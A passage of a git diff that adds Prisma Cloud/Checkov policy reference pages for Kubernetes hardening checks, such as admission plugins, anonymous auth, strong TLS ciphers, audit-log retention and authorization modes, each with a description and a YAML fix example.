+kind: +metadata: + name: +spec: + template: + spec: ++ securityContext: +---- \ No newline at end of file diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-admission-control-plugin-alwaysadmit-is-not-set.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-admission-control-plugin-alwaysadmit-is-not-set.adoc new file mode 100644 index 000000000..0ad532b01 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-admission-control-plugin-alwaysadmit-is-not-set.adoc @@ -0,0 +1,98 @@ +== The admission control plugin AlwaysAdmit is set +// Admission control plugin AlwaysAdmit is set + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 3762e3bb-a855-4191-a4e3-2fd0aacd146d + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerAdmissionControlAlwaysAdmit.py[CKV_K8S_79] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +Do not allow all requests. +Setting admission control plugin AlwaysAdmit allows all requests and does not filter any requests. +The AlwaysAdmit admission controller was deprecated in Kubernetes v1.13. +Its behavior was equivalent to turning off all admission controllers. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind:* Pod + + +[source,yaml] +---- +{ + "apiVersion: v1 +kind: Pod +metadata: + creationTimestamp: null + labels: + component: kube-apiserver + tier: control-plane + name: kube-apiserver-passed + namespace: kube-system +spec: + containers: + - command: + - kube-apiserver + - --enable-admission-plugins=other + image: gcr.io/google_containers/kube-apiserver-amd64:v1.6.0 + livenessProbe: + failureThreshold: 8 + httpGet: + host: 127.0.0.1 + path: /healthz + port: 6443 + scheme: HTTPS + initialDelaySeconds: 15 + timeoutSeconds: 15 + name: kube-apiserver + resources: + requests: + cpu: 250m + volumeMounts: + - mountPath: /etc/kubernetes/ + name: k8s + readOnly: true + - mountPath: /etc/ssl/certs + name: certs + - mountPath: /etc/pki + name: pki + hostNetwork: true + volumes: + - hostPath: + path: /etc/kubernetes + name: k8s + - hostPath: + path: /etc/ssl/certs + name: certs + - hostPath: + path: /etc/pki + name: pki", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-admission-control-plugin-alwayspullimages-is-set.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-admission-control-plugin-alwayspullimages-is-set.adoc new file mode 100644 index 000000000..7b3c6cd24 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-admission-control-plugin-alwayspullimages-is-set.adoc @@ -0,0 +1,68 @@ +== The admission control plugin AlwaysPullImages is not set +// Admission control plugin AlwaysPullImages is not set + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| fe981952-2e96-4313-ab0e-05925403d50d + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerAlwaysPullImagesPlugin.py[CKV_K8S_80] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +Always pull images. +Setting admission control policy to AlwaysPullImages forces every new pod to pull the required images every time. +In a multi-tenant cluster users can be assured that their private images can only be used by those who have the credentials to pull them. +Without this admission control policy, once an image has been pulled to a node, any pod from any user can use it simply by knowing the image's name, without any authorization check against the image ownership. +When this plug-in is enabled, images are always pulled prior to starting containers, which means valid credentials are required. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind:* Pod + + +[source,yaml] +---- +{ + "apiVersion: v1 +kind: Pod +metadata: + creationTimestamp: null + labels: + component: kube-apiserver + tier: control-plane + name: kube-apiserver + namespace: kube-system +spec: + containers: + - command: ++ - kube-apiserver ++ - --enable-admission-plugins=AlwaysPullImages + image: gcr.io/google_containers/kube-apiserver-amd64:v1.6.0 + ...", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-admission-control-plugin-eventratelimit-is-set.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-admission-control-plugin-eventratelimit-is-set.adoc new file mode 100644 index 000000000..024748368 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-admission-control-plugin-eventratelimit-is-set.adoc @@ -0,0 +1,71 @@ +== The admission control plugin EventRateLimit is not set +// Admission control plugin EventRateLimit is not set + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 9780e1eb-3d72-41be-90ad-65fab2400917 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerAdmissionControlEventRateLimit.py[CKV_K8S_78] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +Limit the rate at which the API server accepts requests. +Using EventRateLimit admission control enforces a limit on the number of events that the API Server will accept in a given time slice. + +A misbehaving workload could overwhelm and DoS the API Server, making it unavailable. +This particularly applies to a multi-tenant cluster, where there might be a small percentage of misbehaving tenants which could have a significant impact on the performance of the cluster overall. + +Hence, it is recommended to limit the rate of events that the API server will accept. + +NOTE: This is an Alpha feature in the Kubernetes 1.15 release. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind:* Pod + + +[source,yaml] +---- +apiVersion: apiserver.config.k8s.io/v1 +kind: AdmissionConfiguration +metadata: + name: "admission-configuration-passed" +plugins: + - name: ValidatingAdmissionWebhook + configuration: + apiVersion: apiserver.config.k8s.io/v1 + kind: WebhookAdmissionConfiguration + kubeConfigFile: "" ++ - name: EventRateLimit ++ path: eventconfig.yaml + - name: MutatingAdmissionWebhook + configuration: + apiVersion: apiserver.config.k8s.io/v1 + kind: WebhookAdmissionConfiguration + kubeConfigFile: "" +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-admission-control-plugin-namespacelifecycle-is-set.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-admission-control-plugin-namespacelifecycle-is-set.adoc new file mode 100644 index 000000000..f78fa3e82 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-admission-control-plugin-namespacelifecycle-is-set.adoc @@ -0,0 +1,65 @@ +== The admission control plugin NamespaceLifecycle is not set +// Admission control plugin NamespaceLifecycle is not set + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 2dfa708e-008d-4585-a20b-41c788621aff + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerNamespaceLifecyclePlugin.py[CKV_K8S_83] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +Reject creating objects in a namespace that is undergoing termination. +Setting admission control policy to NamespaceLifecycle ensures that objects cannot be created in non-existent namespaces, and that namespaces undergoing termination are not used for creating the new objects. +This is recommended to enforce the integrity of the namespace termination process and also for the availability of the newer objects. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind:* Pod + + +[source,yaml] +---- +{ + "apiVersion: v1 +kind: Pod +metadata: + creationTimestamp: null + labels: + component: kube-apiserver + tier: control-plane + name: kube-apiserver + namespace: kube-system +spec: + containers: + - command: ++ - kube-apiserver ++ - --enable-admission-plugins=NamespaceLifecycle + image: gcr.io/google_containers/kube-apiserver-amd64:v1.6.0 + ...", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-admission-control-plugin-noderestriction-is-set.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-admission-control-plugin-noderestriction-is-set.adoc new file mode 100644 index 000000000..bb0bc3045 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-admission-control-plugin-noderestriction-is-set.adoc @@ -0,0 +1,66 @@ +== The admission control plugin NodeRestriction is not set +// Admission control plugin NodeRestriction is not set + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 6286b8bb-b744-4700-898e-a953cb7ffd0c + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerNodeRestrictionPlugin.py[CKV_K8S_85] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +Limit the `Node` and `Pod` objects that a kubelet could modify. +Using the `NodeRestriction` plug-in ensures that the kubelet is restricted to the `Node` and ``Pod ``objects that it could modify as defined. +Such kubelets will only be allowed to modify their own `Node` API object, and only modify `Pod` API objects that are bound to their node. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind:* Pod + + +[source,yaml] +---- +{ + "apiVersion: v1 +kind: Pod +metadata: + creationTimestamp: null + labels: + component: kube-apiserver + tier: control-plane + name: kube-apiserver + namespace: kube-system +spec: + containers: + - command: ++ - kube-apiserver ++ - --enable-admission-plugins=NodeRestriction + image: gcr.io/google_containers/kube-apiserver-amd64:v1.6.0 + ...", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-admission-control-plugin-podsecuritypolicy-is-set.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-admission-control-plugin-podsecuritypolicy-is-set.adoc new file mode 100644 index 000000000..7d4e7db08 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-admission-control-plugin-podsecuritypolicy-is-set.adoc @@ -0,0 +1,70 @@ +== The admission control plugin PodSecurityPolicy is not set +// Admission control plugin PodSecurityPolicy is not set + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 2401aa65-cc25-42f5-b5cf-dd9afa96174e + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerPodSecurityPolicyPlugin.py[CKV_K8S_84] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +Reject creating pods that do not match Pod Security Policies. +A Pod Security Policy is a cluster-level resource that controls the actions that a pod can perform and what it has the ability to access. +The PodSecurityPolicy objects define a set of conditions that a pod must run with in order to be accepted into the system. +Pod Security Policies are comprised of settings and strategies that control the security features a pod has access to and hence this must be used to control pod access permissions. + +NOTE: When the PodSecurityPolicy admission plugin is in use, there needs to be at least one PodSecurityPolicy in place for ANY pods to be admitted. See section 5.2 for recommendations on PodSecurityPolicy settings. + + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind:* Pod + + +[source,yaml] +---- +{ + "apiVersion: v1 +kind: Pod +metadata: + creationTimestamp: null + labels: + component: kube-apiserver + tier: control-plane + name: kube-apiserver + namespace: kube-system +spec: + containers: + - command: ++ - kube-apiserver ++ - --enable-admission-plugins=PodSecurityPolicy + image: gcr.io/google_containers/kube-apiserver-amd64:v1.6.0 + ...", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-admission-control-plugin-securitycontextdeny-is-set-if-podsecuritypolicy-is-not-used.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-admission-control-plugin-securitycontextdeny-is-set-if-podsecuritypolicy-is-not-used.adoc new file mode 100644 index 000000000..8274e0bbf --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-admission-control-plugin-securitycontextdeny-is-set-if-podsecuritypolicy-is-not-used.adoc @@ -0,0 +1,65 @@ +== The admission control plugin SecurityContextDeny is set if PodSecurityPolicy is used +// Admission control plugin SecurityContextDeny is set if PodSecurityPolicy is used + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 77990153-befb-46dd-9671-5d6bdb08a79d + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerSecurityContextDenyPlugin.py[CKV_K8S_81] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +The SecurityContextDeny admission controller can be used to deny pods which make use of some SecurityContext fields which could allow for privilege escalation in the cluster. +This should be used where PodSecurityPolicy is not in place within the cluster. +SecurityContextDeny can be used to provide a layer of security for clusters which do not have PodSecurityPolicies enabled. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind:* Pod + + +[source,yaml] +---- +{ + "apiVersion: v1 +kind: Pod +metadata: + creationTimestamp: null + labels: + component: kube-apiserver + tier: control-plane + name: kube-apiserver + namespace: kube-system +spec: + containers: + - command: ++ - kube-apiserver ++ - --enable-admission-plugins=SecurityContextDeny + image: gcr.io/google_containers/kube-apiserver-amd64:v1.6.0 + ...", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-admission-control-plugin-serviceaccount-is-set.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-admission-control-plugin-serviceaccount-is-set.adoc new file mode 100644 index 000000000..31a895cbb --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-admission-control-plugin-serviceaccount-is-set.adoc @@ -0,0 +1,65 @@ +== The admission control plugin ServiceAccount is not set +// Admission control plugin ServiceAccount not set + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| b9d6899b-6a35-4c1c-b618-d1788578ea86 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountPlugin.py[CKV_K8S_82] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +Automate service accounts management. +When you create a pod, if you do not specify a service account, it is automatically assigned the default service account in the same namespace. +You should create your own service account and let the API server manage its security tokens. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind:* Pod + + +[source,yaml] +---- +{ + "apiVersion: v1 +kind: Pod +metadata: + creationTimestamp: null + labels: + component: kube-apiserver + tier: control-plane + name: kube-apiserver + namespace: kube-system +spec: + containers: + - command: ++ - kube-apiserver ++ - --enable-admission-plugins=ServiceAccount + image: gcr.io/google_containers/kube-apiserver-amd64:v1.6.0 + ...", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-anonymous-auth-argument-is-set-to-false-1.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-anonymous-auth-argument-is-set-to-false-1.adoc new file mode 100644 index 000000000..517f06911 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-anonymous-auth-argument-is-set-to-false-1.adoc @@ -0,0 +1,68 @@ +== The --anonymous-auth argument is not set to False for API server +//'--anonymous-auth' argument not set to 'False' for API server + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 044ce38b-e5b3-424d-833e-fab13219fd43 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerAnonymousAuth.py[CKV_K8S_68] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +Disable anonymous requests to the API server. +When enabled, requests that are not rejected by other configured authentication methods are treated as anonymous requests. +These requests are then served by the API server. +You should rely on authentication to authorize access and disallow anonymous requests. +If you are using RBAC authorization, it is generally considered reasonable to allow anonymous access to the API Server for health checks and discovery purposes, and hence this recommendation is not scored. +However, you should consider whether anonymous discovery is an acceptable risk for your purposes. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind*: Pod + + +[source,yaml] +---- +{ + "apiVersion: v1 +kind: Pod +metadata: + creationTimestamp: null + labels: + component: kube-apiserver + tier: control-plane + name: kube-apiserver + namespace: kube-system +spec: + containers: + - command: ++ - kube-apiserver ++ - --anonymous-auth=false + image: gcr.io/google_containers/kube-apiserver-amd64:v1.6.0 + ...", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-anonymous-auth-argument-is-set-to-false.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-anonymous-auth-argument-is-set-to-false.adoc new file mode 100644 index 000000000..051c31163 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-anonymous-auth-argument-is-set-to-false.adoc @@ -0,0 +1,66 @@ +== The --anonymous-auth argument is not set to False for Kubelet +// '--anonymous-auth' argument not set to 'False' for Kubelet + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 6ae55812-7a47-4582-9b3d-45f7ed0d22bd + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/KubeletAnonymousAuth.py[CKV_K8S_138] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +Disable anonymous requests to the Kubelet server. +When enabled, requests that are not rejected by other configured authentication methods are treated as anonymous requests. +These requests are then served by the Kubelet server. +You should rely on authentication to authorize access and disallow anonymous requests. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind:* Pod + + +[source,yaml] +---- +{ + "apiVersion: v1 +kind: Pod +metadata: + creationTimestamp: null + labels: + component: kubelet + tier: control-plane + name: kubelet + namespace: kube-system +spec: + containers: + - command: ++ - kubelet ++ - --anonymous-auth=false + image: gcr.io/google_containers/kubelet-amd64:v1.6.0 + ...", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-api-server-only-makes-use-of-strong-cryptographic-ciphers.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-api-server-only-makes-use-of-strong-cryptographic-ciphers.adoc new file mode 100644 index 000000000..5b78e49a2 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-api-server-only-makes-use-of-strong-cryptographic-ciphers.adoc @@ -0,0 +1,125 @@ +== The API server does not make use of strong cryptographic ciphers + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 4a0e3798-0949-43e5-8340-650cbc468179 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerStrongCryptographicCiphers.py[CKV_K8S_105] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + +//// +Bridgecrew +Prisma Cloud +* The API server does not make use of strong cryptographic ciphers* + + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 4a0e3798-0949-43e5-8340-650cbc468179 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerStrongCryptographicCiphers.py [CKV_K8S_105] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== +//// + + +=== Description + + +Ensure that the API server is configured to only use strong cryptographic ciphers. +TLS ciphers have had a number of known vulnerabilities and weaknesses, which can reduce the protection provided by them. +By default Kubernetes supports a number of TLS ciphersuites including some that have security concerns, weakening the protection provided. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind:* Pod + + +[source,yaml] +---- +{ + "apiVersion: v1 +kind: Pod +metadata: + creationTimestamp: null + labels: + component: kube-apiserver + tier: control-plane + name: kube-apiserver + namespace: kube-system +spec: + containers: + - command: ++ - kube-apiserver ++ - --tls-cipher-suites=TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256 + image: gcr.io/google_containers/kube-apiserver-amd64:v1.6.0 + livenessProbe: + failureThreshold: 8 + httpGet: + host: 127.0.0.1 + path: /healthz + port: 6443 + scheme: HTTPS + initialDelaySeconds: 15 + timeoutSeconds: 15 + name: kube-apiserver-should-pass + resources: + requests: + cpu: 250m + volumeMounts: + - mountPath: /etc/kubernetes/ + name: k8s + readOnly: true + - mountPath: /etc/ssl/certs + name: certs + - mountPath: /etc/pki + name: pki + hostNetwork: true + volumes: + - hostPath: + path: /etc/kubernetes + name: k8s + - hostPath: + path: /etc/ssl/certs + name: certs + - hostPath: + path: /etc/pki + name: pki", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-audit-log-maxage-argument-is-set-to-30-or-as-appropriate.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-audit-log-maxage-argument-is-set-to-30-or-as-appropriate.adoc new file mode 100644 index 000000000..edb22709c --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-audit-log-maxage-argument-is-set-to-30-or-as-appropriate.adoc @@ -0,0 +1,66 @@ +== The --audit-log-maxage argument is not set appropriately +// Retention period for '--audit-log-maxage' argument insufficient + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 8948f1c0-0207-4d94-99f3-f692a951cbb7 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxAge.py[CKV_K8S_92] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Kubernetes, Helm, Kustomize + +|=== + + + +=== Description + + +Retain the logs for at least 30 days or as appropriate. +Retaining logs for at least 30 days ensures that you can go back in time and investigate or correlate any events. +Set your audit log retention period to 30 days or as per your business requirements. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind:* Pod + + +[source,yaml] +---- +{ + "apiVersion: v1 +kind: Pod +metadata: + creationTimestamp: null + labels: + component: kube-apiserver + tier: control-plane + name: kube-apiserver + namespace: kube-system +spec: + containers: + - command: ++ - kube-apiserver ++ - --audit-log-maxage=40 + image: gcr.io/google_containers/kube-apiserver-amd64:v1.6.0 + ...", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-audit-log-maxbackup-argument-is-set-to-10-or-as-appropriate.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-audit-log-maxbackup-argument-is-set-to-10-or-as-appropriate.adoc new file mode 100644 index 000000000..32477dcad --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-audit-log-maxbackup-argument-is-set-to-10-or-as-appropriate.adoc @@ -0,0 +1,67 @@ +== The --audit-log-maxbackup argument is not set appropriately +// '--audit-log-maxbackup' argument not set appropriately + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| a6e0292e-c91a-4339-a2b3-29141f6a9b94 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxBackup.py[CKV_K8S_93] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +Retain 10 or an appropriate number of old log files. +Kubernetes automatically rotates the log files. +Retaining old log files ensures that you would have sufficient log data available for carrying out any investigation or correlation. +For example, if you have set file size of 100 MB and the number of old log files to keep as 10, you would approximate have 1 GB of log data that you could potentially use for your analysis. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind:* Pod + + +[source,yaml] +---- +{ + "apiVersion: v1 +kind: Pod +metadata: + creationTimestamp: null + labels: + component: kube-apiserver + tier: control-plane + name: kube-apiserver + namespace: kube-system +spec: + containers: + - command: ++ - kube-apiserver ++ - --audit-log-maxbackup=15 + image: gcr.io/google_containers/kube-apiserver-amd64:v1.6.0 + ...", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-audit-log-maxsize-argument-is-set-to-100-or-as-appropriate.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-audit-log-maxsize-argument-is-set-to-100-or-as-appropriate.adoc new file mode 100644 index 000000000..b8cce48ad --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-audit-log-maxsize-argument-is-set-to-100-or-as-appropriate.adoc @@ -0,0 +1,67 @@ +== The --audit-log-maxsize argument is not set appropriately +// '--audit-log-maxsize' argument not set appropriately + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 6767c20f-d201-4c6c-8294-53d294fd39f0 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxSize.py[CKV_K8S_94] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +Rotate log files on reaching 100 MB or as appropriate. +Kubernetes automatically rotates the log files. +Retaining old log files ensures that you would have sufficient log data available for carrying out any investigation or correlation. +If you have set file size of 100 MB and the number of old log files to keep as 10, you would approximate have 1 GB of log data that you could potentially use for your analysis. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind:* Pod + + +[source,yaml] +---- +{ + "apiVersion: v1 +kind: Pod +metadata: + creationTimestamp: null + labels: + component: kube-apiserver + tier: control-plane + name: kube-apiserver + namespace: kube-system +spec: + containers: + - command: ++ - kube-apiserver ++ - --audit-log-maxsize=150 + image: gcr.io/google_containers/kube-apiserver-amd64:v1.6.0 + ...", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-audit-log-path-argument-is-set.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-audit-log-path-argument-is-set.adoc new file mode 100644 index 000000000..d9ef69ca9 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-audit-log-path-argument-is-set.adoc @@ -0,0 +1,67 @@ +== The --audit-log-path argument is not set +// '--audit-log-path' argument not set + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 3814f782-44fb-47fc-82b2-390669d518a1 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLog.py[CKV_K8S_91] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +Enable auditing on the Kubernetes API Server and set the desired audit log path. +Auditing the Kubernetes API Server provides a security-relevant chronological set of records documenting the sequence of activities that have affected system by individual users, administrators or other components of the system. +Even though currently, Kubernetes provides only basic audit capabilities, it should be enabled. +You can enable it by setting an appropriate audit log path. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind:* Pod + + +[source,yaml] +---- +{ + "apiVersion: v1 +kind: Pod +metadata: + creationTimestamp: null + labels: + component: kube-apiserver + tier: control-plane + name: kube-apiserver + namespace: kube-system +spec: + containers: + - command: + + - kube-apiserver + + - --audit-log-path=/path/to/log + image: gcr.io/google_containers/kube-apiserver-amd64:v1.6.0 + ...", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-authorization-mode-argument-includes-node.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-authorization-mode-argument-includes-node.adoc new file mode 100644 index 000000000..b4aea1ea7 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-authorization-mode-argument-includes-node.adoc @@ -0,0 +1,65 @@ +== The --authorization-mode argument does not include node +// '--authorization-mode' argument does not include node + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 5cc5bc2e-ad86-49e7-b48e-5e64745439c4 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNode.py[CKV_K8S_75] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +Restrict kubelet nodes to reading only objects associated with them. +The Node authorization mode only allows kubelets to read Secret, ConfigMap, PersistentVolume, and PersistentVolumeClaim objects associated with their nodes. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind:* Pod + + +[source,yaml] +---- +{ + "apiVersion: v1 +kind: Pod +metadata: + creationTimestamp: null + labels: + component: kube-apiserver + tier: control-plane + name: kube-apiserver + namespace: kube-system +spec: + containers: + - command: ++ - kube-apiserver ++ - --authorization-mode=RBAC,Node + image: gcr.io/google_containers/kube-apiserver-amd64:v1.6.0 + ...", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-authorization-mode-argument-includes-rbac.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-authorization-mode-argument-includes-rbac.adoc new file mode 100644 index 000000000..217a78a36 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-authorization-mode-argument-includes-rbac.adoc @@ -0,0 +1,66 @@ +== The --authorization-mode argument does not include RBAC +// '--authorization-mode' argument does not include RBAC + + +=== Policy Details + +[width=45%] +[cols="1,1"] 